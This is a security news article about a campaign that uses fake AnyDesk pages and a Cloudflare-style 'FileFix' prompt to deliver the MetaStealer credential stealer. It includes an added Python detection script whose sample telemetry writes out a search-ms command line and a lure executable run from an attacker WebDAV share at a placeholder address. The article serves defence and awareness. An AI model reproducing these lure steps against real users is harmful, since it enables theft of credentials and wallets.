Cybersecurity researchers have uncovered a campaign that abuses the reputation of AnyDesk, one of the most widely used remote access tools. By posing as the AnyDesk download page, attackers lure victims who search online for the software into installing MetaStealer, an information-stealing program that harvests credentials. Victims land on fraudulent sites that present a polished human-verification prompt styled after Cloudflare's challenge screen, so the deception looks like a routine step rather than an attack.
The ClickFix Technique Evolved
This attack is a reinvention of the classic ClickFix scam. In the traditional version, users are tricked into pasting an attacker-supplied command into the Windows Run dialog, and that command fetches and executes the payload. In this campaign the attackers instead use "FileFix", a variant that abuses Windows File Explorer. When the victim clicks the fake verification button, the site triggers a hidden Windows search request that opens File Explorer against a server under the attacker's control, so the attacker's files are presented to the victim through the ordinary Explorer window. Replacing a visible, pasted command with a silent system action leaves the victim less to notice, which makes the scam harder to detect and more likely to succeed.
From Verification to Infection
Once activated, the attack delivers a file named Readme Anydesk.pdf. Despite the document-style name it is an installer, and the deception runs deeper: it launches the genuine AnyDesk setup in the background, creating an illusion of legitimacy, while MetaStealer silently installs itself on the system. MetaStealer is built to steal login credentials, browser data and cryptocurrency wallet information. The dual-action delivery reduces suspicion and gives the malware a foothold before the user realizes anything is wrong.
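Detection logic for the chain described in the two sections above (the File Explorer trigger and the decoy installer), as an added example rather than anything from the original article or from the researchers who reported the campaign. It assumes telemetry in the shape of Windows process-creation events (image path, command line, parent image, as Sysmon Event ID 1 provides), and that the hidden search is delivered through the search-ms: protocol handler, which Windows hands to explorer.exe; the article says only "hidden search function", so search-ms is an assumption here. The sample events, the host 203.0.113.5, and the double extension on the lure file are constructed for the example.

```python
import re
from dataclasses import dataclass

# Assumptions (not from the article): events come from a process-creation source
# such as Sysmon Event ID 1, and the "hidden search" is a search-ms: protocol
# handler URL, which Windows passes to explorer.exe.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".lnk", ".msi"}
DOC_EXT = (".pdf", ".doc", ".docx", ".txt", ".rtf")
# search-ms URLs point Explorer at a location via a "crumb=location:\\host\share" parameter
CRUMB_HOST = re.compile(r'location:\\\\([^\\"&]+)', re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def is_remote_path(path: str) -> bool:
    # UNC shares (\\host\share) and the WebDAV redirector (\\host@80\DavWWWRoot\...)
    return path.startswith("\\\\")


def is_document_masquerade(name: str) -> bool:
    # "Readme Anydesk.pdf.exe": a document-looking name carrying an executable extension
    stem, dot, ext = name.lower().rpartition(".")
    return bool(dot) and ("." + ext) in EXEC_EXT and stem.endswith(DOC_EXT)


def analyze(events):
    findings = []
    for ev in events:
        parent = basename(ev.parent_image)
        name = basename(ev.image)
        # Rule 1: a browser invoked the search-ms handler (the FileFix trigger).
        # A genuine Cloudflare check never launches File Explorer.
        if parent in BROWSERS and "search-ms:" in ev.cmdline.lower():
            m = CRUMB_HOST.search(ev.cmdline)
            findings.append({"rule": "search-ms-from-browser", "pid": ev.pid,
                             "detail": m.group(1) if m else ev.cmdline})
        # Rule 2: code executed straight from a remote share; worse when the
        # name pretends to be a document such as "Readme Anydesk.pdf".
        if is_remote_path(ev.image):
            rule = "remote-exec-masquerade" if is_document_masquerade(name) else "remote-exec"
            findings.append({"rule": rule, "pid": ev.pid, "detail": ev.image})
        # Rule 3: a process running from a remote share launched AnyDesk setup,
        # the decoy the article describes.
        if is_remote_path(ev.parent_image) and "anydesk" in name:
            findings.append({"rule": "remote-parent-spawns-anydesk", "pid": ev.pid,
                             "detail": f"{ev.parent_image} -> {ev.image}"})
    return findings


# Constructed sample telemetry (not real captures): browser -> explorer.exe with a
# search-ms URL, a lure executable run from the WebDAV share, the decoy AnyDesk
# setup spawned by that lure, and one benign AnyDesk launch for contrast.
SAMPLE_EVENTS = [
    ProcEvent(4100, 800, r"C:\Windows\explorer.exe",
              r'"C:\Windows\explorer.exe" "search-ms:query=Readme%20Anydesk&crumb=location:\\203.0.113.5@80\DavWWWRoot\files"',
              r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent(4188, 1200, r"\\203.0.113.5@80\DavWWWRoot\files\Readme Anydesk.pdf.exe",
              r'"\\203.0.113.5@80\DavWWWRoot\files\Readme Anydesk.pdf.exe"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4210, 4188, r"C:\Users\victim\AppData\Local\Temp\AnyDesk.exe",
              r'"C:\Users\victim\AppData\Local\Temp\AnyDesk.exe"',
              r"\\203.0.113.5@80\DavWWWRoot\files\Readme Anydesk.pdf.exe"),
    ProcEvent(4300, 1200, r"C:\Program Files\AnyDesk\AnyDesk.exe",
              r'"C:\Program Files\AnyDesk\AnyDesk.exe"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The three rules are deliberately independent: the search-ms launch and the later execution from the share do not sit in one parent-child chain, because the browser-spawned explorer.exe hands the window to the existing shell process, so correlating them by process tree alone would miss the chain. Run over the constructed events, the first three are flagged and the ordinary launch of an installed AnyDesk is not.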
A Wider Trend of “Fix” Scams
Security experts see this campaign as part of a larger evolution in social engineering attacks. By blending recognizable elements, such as Cloudflare-style verification, with technical shortcuts inside Windows, attackers make their schemes far more believable. These scams thrive on urgency and familiarity, pressuring users to verify quickly while disguising malicious actions as ordinary system behavior. A practical tell: a genuine Cloudflare verification never asks the user to press keyboard shortcuts, paste text, or open File Explorer, and any "verification" that does is the attack itself. Researchers warn that without awareness and caution, victims may unwittingly hand attackers the keys to their most sensitive data.